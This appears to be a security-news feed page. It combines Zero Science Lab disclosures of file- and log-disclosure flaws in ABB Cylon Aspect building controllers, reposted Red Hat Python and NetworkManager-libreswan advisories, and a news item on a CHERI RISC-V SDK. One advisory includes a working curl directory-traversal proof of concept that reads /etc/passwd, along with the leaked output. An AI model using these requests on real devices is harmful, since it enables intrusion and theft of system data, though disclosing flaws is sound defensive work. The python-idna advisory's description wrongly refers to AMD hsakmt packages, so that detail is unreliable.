ABB Cylon Aspect version 3.08.02 suffers from an authenticated arbitrary file disclosure vulnerability. Input passed through the logFile GET parameter via the logYumLookup.php script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.

ABB Cylon Aspect 3.08.02 (logYumLookup.php) Authenticated File Disclosure

Vendor: ABB Ltd. 
Product web page: https://www.global.abb 
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio 
 Firmware: 3.08.02

Summary: ASPECT is an award-winning scalable building energy management 
and control solution designed to allow users seamless access to their 
building data through standard building protocols including smart devices.

Desc: The building management system suffers from an authenticated arbitrary 
file disclosure vulnerability. Input passed through the 'logFile' GET parameter 
via the 'logYumLookup.php' script is not properly verified before being used 
to download log files. This can be exploited to disclose the contents of arbitrary 
and sensitive files via directory traversal attacks.

Tested on: GNU/Linux 3.15.10 (armv7l) 
 GNU/Linux 3.10.0 (x86_64) 
 GNU/Linux 2.6.32 (x86_64) 
 Intel(R) Atom(TM) Processor E3930 @ 1.30GHz 
 Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz 
 PHP/7.3.11 
 PHP/5.6.30 
 PHP/5.4.16 
 PHP/4.4.8 
 PHP/5.3.3 
 AspectFT Automation Application Server 
 lighttpd/1.4.32 
 lighttpd/1.4.18 
 Apache/2.2.15 (CentOS) 
 OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) 
 OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic 
 @zeroscience

Advisory ID: ZSL-2024-5849 
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5849.php

21.04.2024

--

$ cat project

 P R O J E C T

 .| 
 | | 
 |'| ._____ 
 ___ | | |. |' .---"| 
 _ .-' '-. | | .--'| || | _| | 
 .-'| _.| | || '-__ | | | || | 
 |' | |. | || | | | | || | 
 ____| '-' ' "" '-' '-.' '` |____ 
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
 ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
 ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
 ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
 ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ 
 ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
 ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
 ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ 

 $ curl "http://192.168.73.31/logYumLookup.php?logFile=/etc/passwd" -H "Cookie: PHPSESSID=xxx" 
aamtech:x:500:500::/home/aamtech:/bin/sh 
mysql:x:993:65534::/var/mysql: 
ppp:x:994:65534::/dev/null:/usr/sbin/ppp-dialin 
xuser:x:1000:1000::/home/xuser: 
sshd:x:995:992::/var/run/sshd:/bin/false 
avahi-autoipd:x:996:993:Avahi autoip daemon:/var/run/avahi-autoipd:/bin/false 
avahi:x:997:994::/var/run/avahi-daemon:/bin/false 
systemd-journal-gateway:x:998:995::/home/systemd-journal-gateway: 
messagebus:x:999:998::/var/lib/dbus:/bin/false 
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh 
irc:x:39:39:ircd:/var/run/ircd:/bin/sh 
list:x:38:38:Mailing List Manager:/var/list:/bin/sh 
backup:x:34:34:backup:/var/backups:/bin/sh 
www-data:x:33:33:www-data:/var/www:/bin/sh 
proxy:x:13:13:proxy:/bin:/bin/sh 
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh 
news:x:9:9:news:/var/spool/news:/bin/sh 
mail:x:8:8:mail:/var/mail:/bin/sh 
lp:x:7:7:lp:/var/spool/lpd:/bin/sh 
man:x:6:12:man:/var/cache/man:/bin/sh 
games:x:5:60:games:/usr/games:/bin/sh 
sync:x:4:65534:sync:/bin:/bin/sync 
sys:x:3:3:sys:/dev:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
root:x:0:0:root:/home/root:/bin/sh

ABB Cylon Aspect 3.08.02 logYumLookup.php Authenticated File Disclosure

Red Hat Security Advisory 2024-8374-03 - An update for python3.11 is now available for Red Hat Enterprise Linux 9.4 Extended Update Support.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8374.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: python3.11 security updateAdvisory ID:        RHSA-2024:8374-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8374Issue date:         2024-10-23Revision:           03CVE Names:          CVE-2024-6232====================================================================Summary: An update for python3.11 is now available for Red Hat Enterprise Linux 9.4 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: cpython: tarfile: ReDos via excessive backtracking while parsing header values (CVE-2024-6232)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6232References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2309426

Red Hat Security Advisory 2024-8374-03

Red Hat Security Advisory 2024-8365-03 - An update for python-idna is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8365.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: python-idna security updateAdvisory ID:        RHSA-2024:8365-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8365Issue date:         2024-10-23Revision:           03CVE Names:          CVE-2024-3651====================================================================Summary: An update for python-idna is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The hsakmt packages include a thunk library for AMD's Heterogeneous System Architecture (HSA) Linux kernel driver (amdkfd).Security Fix(es):* python-idna: potential DoS via resource consumption via specially crafted inputs to idna.encode() (CVE-2024-3651)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-3651References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2274779

Red Hat Security Advisory 2024-8365-03

The software development kit will simplify building and testing of CHERI-enabled RISC-V applications.

Source: Mentor58 via Alamy Stock Photo

German processor design company Codasip has donated its latest RISC-V software development kit to chip security consortium CHERI Alliance to help developers add memory safety to chips.

RISC-V is an instruction set architecture (ISA) that allows developers and manufacturers to personalize silicon chips with capabilities to meet their needs, such as for use in smartphones, space technologies, industrial applications, and automotive technologies, to name a few. RISV-V is open and free to license, so anyone can design, manufacture, and sell RISC-V chips and software.

CHERI (Capability Hardware Enhanced RISC Instructions) extends ISA to manage memory access control to prevent common vulnerabilities, such as buffer overflows and memory corruption. The method involves isolating the hardware and software so that adversaries cannot inject attack code into memory. The CHERI Alliance is an industry consortium focused on promoting the development and adoption of security technologies that protect data stored in hardware memory.

Developers need access to tools and packages that are available for CHERI — this is what the SDK that Codasip built and donated to the CHERI Alliance offers. The compiler is capable of generating the modified instructions. Anyone implementing CHERI on RISC-V chips can access the SDK, which is freely available on GitHub.

The SDK includes:

*   C/C++ compiler and toolchain based on LLVM17
    

*   QEMU open source emulator
    
*   OpenSBI implementation of the RISC-V Supervisor Binary Interface
    

*   Yocto build system for Linux
    
*   Basic user space environment based on Busybox
    

"As more organizations and governments discover the potential of the CHERI technology to protect us, we need to speed up the pace of making the technology available in real systems," Codasip CEO Ron Black said in a statement. "We have made a massive effort to implement a full Linux-capable SDK that we are now opening for everyone to use."

**About the Author**

Codasip Donates Tools to Develop Memory-Safe Chips

ABB Cylon Aspect version 3.08.01 suffers from an unauthenticated log information disclosure vulnerability. An unauthorized attacker can reference the affected page and disclose the webserver's log file containing system information running on the device.

ABB Cylon Aspect 3.08.01 (logCriticalLookup.php) Unauthenticated Log DisclosureVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.08.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The ABB BMS/BAS controller suffers from an unauthenticated log informationdisclosure vulnerability. An unauthorized attacker can reference the affectedpage and disclose the webserver's log file containing system information runningon the device.Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscienceAdvisory ID: ZSL-2024-5848Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5848.php21.04.2024--$ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl http://192.168.73.31/logCriticalLookup.php

ABB Cylon Aspect 3.08.01 logCriticalLookup.php Unauthenticated Log Disclosure

ABB Cylon Aspect 3.08.01 (throttledLog.php) Unauthenticated Log DisclosureVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.08.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The ABB BMS/BAS controller suffers from an unauthenticated log informationdisclosure vulnerability. An unauthorized attacker can reference the affectedpage and disclose the webserver's log file containing system information runningon the device.Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscienceAdvisory ID: ZSL-2024-5847Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5847.php21.04.2024--$ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl http://192.168.73.31/throttledLog.php?instance=1

ABB Cylon Aspect 3.08.01 throttledLog.php Unauthenticated Log Disclosure

Red Hat Security Advisory 2024-8359-03 - An update for the python39:3.9 and python39-devel:3.9 module is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8359.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: python39:3.9 and python39-devel:3.9 security updateAdvisory ID:        RHSA-2024:8359-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8359Issue date:         2024-10-23Revision:           03CVE Names:          CVE-2024-6232====================================================================Summary: An update for the python39:3.9 and python39-devel:3.9 module is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: cpython: tarfile: ReDos via excessive backtracking while parsing header values (CVE-2024-6232)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6232References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2309426

Red Hat Security Advisory 2024-8359-03

Red Hat Security Advisory 2024-8358-03 - An update for NetworkManager-libreswan is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include a privilege escalation vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8358.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: NetworkManager-libreswan security updateAdvisory ID:        RHSA-2024:8358-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8358Issue date:         2024-10-23Revision:           03CVE Names:          CVE-2024-9050====================================================================Summary: An update for NetworkManager-libreswan is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This package contains software for integrating the libreswan VPN software with NetworkManager and the GNOME desktopSecurity Fix(es):* NetworkManager-libreswan: Local privilege escalation via leftupdown (CVE-2024-9050)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-9050References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2313828

Red Hat Security Advisory 2024-8358-03

Red Hat Security Advisory 2024-8357-03 - An update for NetworkManager-libreswan is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support. Issues addressed include a privilege escalation vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8357.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: NetworkManager-libreswan security updateAdvisory ID:        RHSA-2024:8357-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8357Issue date:         2024-10-23Revision:           03CVE Names:          CVE-2024-9050====================================================================Summary: An update for NetworkManager-libreswan is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This package contains software for integrating the libreswan VPN software with NetworkManager and the GNOME desktopSecurity Fix(es):* NetworkManager-libreswan: Local privilege escalation via leftupdown (CVE-2024-9050)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-9050References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2313828

Red Hat Security Advisory 2024-8357-03

Red Hat Security Advisory 2024-8356-03 - An update for NetworkManager-libreswan is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service. Issues addressed include a privilege escalation vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8356.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: NetworkManager-libreswan security updateAdvisory ID:        RHSA-2024:8356-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8356Issue date:         2024-10-23Revision:           03CVE Names:          CVE-2024-9050====================================================================Summary: An update for NetworkManager-libreswan is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This package contains software for integrating the libreswan VPN software with NetworkManager and the GNOME desktopSecurity Fix(es):* NetworkManager-libreswan: Local privilege escalation via leftupdown (CVE-2024-9050)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-9050References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2313828

Tag

#linux